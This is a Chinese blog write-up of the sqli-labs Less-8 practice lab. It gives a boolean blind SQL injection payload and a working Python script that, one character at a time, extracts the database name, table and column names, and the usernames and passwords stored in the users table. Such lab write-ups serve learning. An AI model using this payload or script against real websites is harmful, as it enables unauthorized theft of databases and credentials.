sqlilabs less-8

先判断是数字还是字符呢


数字加字符还是没问题，是字符型了。再尝试构造。因为这次只会返回正确与否，所以考虑盲注。

先判断数据库长度
然后判断数据库名

这要用到

substr(内容,n,m)从内容的第n位截取m个 length() 还有一个关键的sql语句
?id=1’ and
substr((select group_concat(table_name) from information_schema.tables
where table_schema =database() ),1,1)=‘u’–+

工作量有点大，可以考虑burp suite 或者用脚本

import requests
url = 'http://localhost/sqlilabs/Less-8/?id=1\''
datalens = 0 
datanamee = ''
sign = "You are in..........."
tablename = ''
columnlist = ''
list1= ['id','username','password','user','currentconnections','totalconnections']
valuelist = ''

#数据库长度
for i in range(10):
    rl = str(i)
    lenurl = url + "and length(database())=" + rl + "--+"
    r = requests.get(lenurl)
    if sign in r.text:
        print("database len " + str(i))
        datalens = i + 1
#数据库名
wordlist = "abcdefghijklmnopqrstuvwxyz"
for i in range(1,datalens):
    dataname = url + "and substr(database()," + str(i) + "," +"1)"
    for w in wordlist:
        datanames = dataname + "=" + "'" + w + "'" + "--+"
        r = requests.get(datanames)
        if sign in r.text:
            datanamee += w
print("database name " + datanamee)

#数据库表名
wordlist2 = "abcdefghijklmnopqrstuvwxyz,"
for i in range(1,100):
    tableurl1 = url + " and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(i) + ",1)="
    for v in wordlist2:
        tableurl = tableurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(tableurl)
        if sign in r.text:
            tablename += v
print("database table " + tablename)

#数据库字段名
for i in range(1,100):
    columnurl1 = url + " and substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\' )," + str(i) + ",1)="
    for v in wordlist2:
        columnurl = columnurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(columnurl)
        if sign in r.text:
            columnlist += v
print("database colum " + columnlist)
print(list1)

#数据库元组
wordlist2 = "0123456789abcdefghijklmnopqrstuvwxyz,=-_/\\."

for n in range(6):
    for i in range(1,200):
        valueurl1 = url + " and substr((select group_concat(" + list1[n] + ") from users )," + str(i) + ",1)="
        for v in wordlist2:
            valueurl = valueurl1 + "\'" + v + "\'" + "--+"
            r = requests.get(valueurl)
            if sign in r.text:
                valuelist += v
    print("database " + list1[n] + ' ' + valuelist)
    valuelist = ''

有目共睹，博主编程力有未逮，有待提高。